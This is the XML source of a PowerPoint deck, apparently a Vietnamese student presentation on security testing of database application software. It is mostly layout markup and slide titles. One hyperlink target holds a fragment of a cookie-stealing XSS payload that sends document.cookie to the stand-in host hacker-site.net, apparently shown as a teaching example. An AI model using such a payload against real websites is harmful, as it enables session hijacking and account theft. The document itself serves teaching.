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96" r:id="rId2"/>
    <p:sldId id="297" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="281" r:id="rId5"/>
    <p:sldId id="282" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="284" r:id="rId8"/>
    <p:sldId id="285" r:id="rId9"/>
    <p:sldId id="286" r:id="rId10"/>
    <p:sldId id="287" r:id="rId11"/>
    <p:sldId id="289" r:id="rId12"/>
    <p:sldId id="290" r:id="rId13"/>
    <p:sldId id="291" r:id="rId14"/>
    <p:sldId id="292" r:id="rId15"/>
    <p:sldId id="293" r:id="rId16"/>
    <p:sldId id="298" r:id="rId17"/>
    <p:sldId id="294" r:id="rId18"/>
    <p:sldId id="295" r:id="rId19"/>
  </p:sldIdLst>
  <p:sldSz cx="18288000" cy="10287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778" autoAdjust="0"/>
    <p:restoredTop sz="91860" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="77" d="100"/>
          <a:sy n="77" d="100"/>
        </p:scale>
        <p:origin x="144" y="9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3/19/2024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3/19/2024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3/19/2024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3/19/2024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3/19/2024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3/19/2024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15.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hacker-site.net/%E2%80%9D+document.cookie;" TargetMode="External"/><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hyperlink" Target="http://hacker-site.net/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/" TargetMode="External"/><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7.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><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7.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.pn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7.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.svg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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12.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5.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13.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6.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84352" y="-137534"/>
            <a:ext cx="19395249"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35000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect t="-20561" r="-27529" b="-6968"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Crimson Pro" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8587763" y="1324108"/>
            <a:ext cx="1398750" cy="1398750"/>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15759"/>
            </a:solidFill>
            <a:ln w="161925" cap="sq">
              <a:solidFill>
                <a:srgbClr val="F80B0D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 5"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="38100"/>
              <a:ext cx="660400" cy="698500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="3360"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr>
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9810750" y="-1485776"/>
            <a:ext cx="13258553" cy="13258553"/>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15759"/>
            </a:solidFill>
            <a:ln w="571500" cap="sq">
              <a:solidFill>
                <a:srgbClr val="F80B0D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="38100"/>
              <a:ext cx="660400" cy="698500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="3360"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr>
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9848915" y="622495"/>
            <a:ext cx="812410" cy="812410"/>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15759"/>
            </a:solidFill>
            <a:ln w="161925" cap="sq">
              <a:solidFill>
                <a:srgbClr val="F80B0D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="38100"/>
              <a:ext cx="660400" cy="698500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="3360"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr>
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 12"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10883424" y="-413081"/>
            <a:ext cx="11113206" cy="11113161"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6350000" cy="6349975"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 13"/>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3"/>
              <a:stretch>
                <a:fillRect l="-25997" r="-25997"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909602" y="6473540"/>
            <a:ext cx="8306192" cy="589777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4900"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3500" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:rPr>
              <a:t>MÔN: Bảo mật cơ sở dữ liệu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="927232" y="7251782"/>
            <a:ext cx="5226215" cy="441018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3640"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:rPr>
              <a:t>DHHTTT17B - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>420300409302</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Crimson Pro" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Freeform 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8355465" y="5537746"/>
            <a:ext cx="4611720" cy="4611720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4611720" h="4611720">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4611720" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4611720" y="4611720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4611720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4">
              <a:alphaModFix amt="60000"/>
              <a:extLst>
                <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                  <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId5"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Crimson Pro" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="AutoShape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5533097" y="7678671"/>
            <a:ext cx="3176777" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="flat">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Crimson Pro" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="AutoShape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="904656" y="9277350"/>
            <a:ext cx="7236478" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="flat">
            <a:solidFill>
              <a:srgbClr val="293E6B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Crimson Pro" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642418" y="2803505"/>
            <a:ext cx="8555901" cy="2078839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="17780" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="4000" b="1">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rPr>
              <a:t>Chủ đề 6: Một cách tiếp cận để kiểm tra bảo mật của phần mềm ứng dụng cơ sở dữ liệu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="400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5" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6435579" y="7211443"/>
            <a:ext cx="1371814" cy="434221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3640"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:rPr>
              <a:t>NHÓM 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946948" y="8661995"/>
            <a:ext cx="8999366" cy="434221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3640"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3B599B"/>
                </a:solidFill>
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:rPr>
              <a:t>GIẢNG VIÊN: VÕ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3B599B"/>
                </a:solidFill>
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:rPr>
              <a:t>NGỌC TẤN PHƯỚC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Freeform 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2337050" cy="1019595"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2337050" h="1019595">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2337050" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2337050" y="1019595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1019595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Crimson Pro"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B062B5-A663-355D-DDFE-E19CED73340C}"/>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9B411FDD-3A73-6FAF-EEF4-CA4B7FAF1017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5699680" y="-1470403"/>
            <a:ext cx="14026196" cy="11628992"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14026196" h="11628992">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14026196" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14026196" y="11628992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="116289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2" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D278905-418D-3162-1EBE-51A900D3E923}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760920" y="876300"/>
            <a:ext cx="15544799" cy="1647887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="none" spc="-84">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>II. Tìm hiểu về thực trạng và các công việc liên quan đến bảo mật hiện nay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3356EC57-1CA7-E828-AC9B-6CC5C63E3075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="742951" y="2698265"/>
            <a:ext cx="16802100" cy="6712434"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ED79D14-FF7D-A3BD-3D77-38AC14FE27E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40798" y="71151"/>
              <a:ext cx="3271246" cy="2164112"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3271246" h="2164112">
                  <a:moveTo>
                    <a:pt x="57855" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3213391" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3228735" y="0"/>
                    <a:pt x="3243451" y="6095"/>
                    <a:pt x="3254301" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3265150" y="27795"/>
                    <a:pt x="3271246" y="42511"/>
                    <a:pt x="3271246" y="57855"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3271246" y="2106257"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3271246" y="2121601"/>
                    <a:pt x="3265150" y="2136317"/>
                    <a:pt x="3254301" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3243451" y="2158016"/>
                    <a:pt x="3228735" y="2164112"/>
                    <a:pt x="3213391" y="2164112"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57855" y="2164112"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42511" y="2164112"/>
                    <a:pt x="27795" y="2158016"/>
                    <a:pt x="16945" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6095" y="2136317"/>
                    <a:pt x="0" y="2121601"/>
                    <a:pt x="0" y="2106257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="57855"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="42511"/>
                    <a:pt x="6095" y="27795"/>
                    <a:pt x="16945" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27795" y="6095"/>
                    <a:pt x="42511" y="0"/>
                    <a:pt x="57855" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E6C6732-3C54-4070-8192-7C256629F7EF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="172424"/>
              <a:ext cx="1554027" cy="405219"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E4242AE-E8EA-82B1-F124-DE6DC72B53C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1244828" y="2654163"/>
            <a:ext cx="9863328" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
